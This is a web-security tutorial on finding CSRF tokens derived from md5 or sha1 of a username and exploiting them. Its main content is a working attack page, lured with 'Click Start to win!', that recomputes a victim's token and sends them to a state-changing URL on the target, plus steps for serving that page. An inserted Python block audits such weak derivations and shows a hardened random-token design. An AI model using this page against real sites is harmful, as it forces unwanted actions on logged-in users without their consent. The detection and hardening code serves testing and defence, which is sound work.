Exploiting Weak CSRF Tokens

Many web applications do not implement robust token generation for CSRF (Cross-Site Request Forgery) protection. This note outlines a generic approach to identifying and exploiting weak CSRF token generation mechanisms; the same steps can be applied across many web applications.


🔍 Identifying Weak CSRF Tokens

  1. Register an Account: Create a user account on the target application.

  2. Inspect Requests: Use web developer tools to monitor network requests and identify the CSRF token being used.

  3. Analyze Token Generation:

    • Check if the CSRF token is generated using predictable algorithms, such as:

      • md5(username)

      • sha1(username)

      • md5(current date + username)

Example of Token Verification

To verify if the CSRF token is generated from the username, you can calculate the MD5 hash of the username and compare it to the CSRF token value.

echo -n username | md5sum

If the resulting hash matches the CSRF token, it indicates a weak token generation mechanism.
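The following is an added example (not code from the original note) that puts the check above into a small Python audit helper: it reproduces the three predictable derivations listed in the previous step (md5(username), sha1(username), md5(date + username)) and reports which one, if any, matches a captured token. It also shows the fix a developer should apply: a token drawn from the OS CSPRNG, stored only in the server-side session and compared in constant time, so that a page on another origin cannot compute it from the username. The date format, the `SessionStore` class and the sample values are assumptions made for the example.

```python
"""Audit helper and hardened replacement for CSRF token generation.

Added example, not part of the original note. The weak generators mirror
the predictable patterns the note tells you to look for; the hardened
SessionStore shows the corrected design next to them.
"""
import hashlib
import hmac
import secrets


# --- Weak generators: the patterns the note says to test for ---------------

def weak_md5_username(username: str) -> str:
    """Equivalent to `echo -n username | md5sum`."""
    return hashlib.md5(username.encode()).hexdigest()


def weak_sha1_username(username: str) -> str:
    return hashlib.sha1(username.encode()).hexdigest()


def weak_md5_date_username(username: str, day: str) -> str:
    # The "YYYY-MM-DD" + username layout is an assumption; applications
    # vary, so an audit should try the date format the target is observed
    # to use.
    return hashlib.md5((day + username).encode()).hexdigest()


def predictable_derivation(token: str, username: str, day: str):
    """Return the name of the derivation that reproduces `token`, or None.

    This generalises the md5sum check in the note to all three listed
    patterns. hmac.compare_digest is used so the same helper can safely
    sit in server-side test code without leaking timing information.
    """
    candidates = {
        "md5(username)": weak_md5_username(username),
        "sha1(username)": weak_sha1_username(username),
        "md5(date + username)": weak_md5_date_username(username, day),
    }
    for name, derived in candidates.items():
        if hmac.compare_digest(token.lower(), derived):
            return name
    return None


# --- Hardened replacement ---------------------------------------------------

class SessionStore:
    """Minimal stand-in for server-side session storage (constructed)."""

    def __init__(self):
        self._tokens = {}

    def issue_token(self, session_id: str) -> str:
        # 32 random bytes from the OS CSPRNG. Neither the username nor the
        # date is an input, so knowing the victim's username gives an
        # attacker nothing. The token lives only in this session and in the
        # page the server renders for it, which a cross-origin page cannot
        # read.
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def verify(self, session_id: str, submitted) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        # Constant-time comparison; also False when lengths differ.
        return hmac.compare_digest(expected, submitted)


if __name__ == "__main__":
    user = "victim_username"   # constructed sample value
    today = "2024-01-15"       # constructed sample date

    captured = weak_md5_username(user)      # what a weak app would emit
    print("captured token derivation:", predictable_derivation(captured, user, today))

    store = SessionStore()
    real = store.issue_token("session-abc")
    forged = weak_md5_username(user)        # what a PoC page could compute
    print("forged token accepted:", store.verify("session-abc", forged))
    print("real token accepted:", store.verify("session-abc", real))
    print("real token predictable:", predictable_derivation(real, user, today))
```

Run it directly to see the weak token flagged as `md5(username)` while the session-bound token is neither predictable nor accepted for a different session. The design point is that a CSRF token must be a secret shared between the server and the legitimate page, not a value any party can recompute from public data.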


🛠️ Crafting a Malicious Page

Once you identify a weak CSRF token generation mechanism, you can create a malicious page to exploit it. Below is a generic structure for such a page:

Malicious HTML Page

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Proof-of-concept</title>
    <script src="./md5.min.js"></script>
</head>
<body>
    <h1>Click Start to win!</h1>
    <button onclick="trigger()">Start!</button>

    <script>
        let host = 'http://target-application.com';

        function trigger() {
            // Open the target page first so the server creates or refreshes
            // the CSRF token for the victim's logged-in session.
            window.open(`${host}/app/change-visibility`);
            // Give the server time to issue the token before sending the request.
            window.setTimeout(startPoc, 2000);
        }

        function startPoc() {
            // Recompute the token the same way the weak server does: md5(username).
            let hash = md5("victim_username");
            window.location = `${host}/app/change-visibility/confirm?csrf=${hash}&action=change`;
        }
    </script>
</body>
</html>

JavaScript for MD5 Hashing

You will need a JavaScript file for MD5 hashing functionality, which can be included in your malicious page:

// md5.min.js content (as provided in the original example)
!function(n){"use strict";...}(this);

🚀 Executing the Attack

  1. Serve the Malicious Page: Use a simple HTTP server to host your malicious page.

    python -m http.server 1337

  2. Victim Interaction: The victim must be logged into the target application. When they visit your malicious page and click "Start," the CSRF attack will be executed, potentially changing their profile visibility or performing other actions.
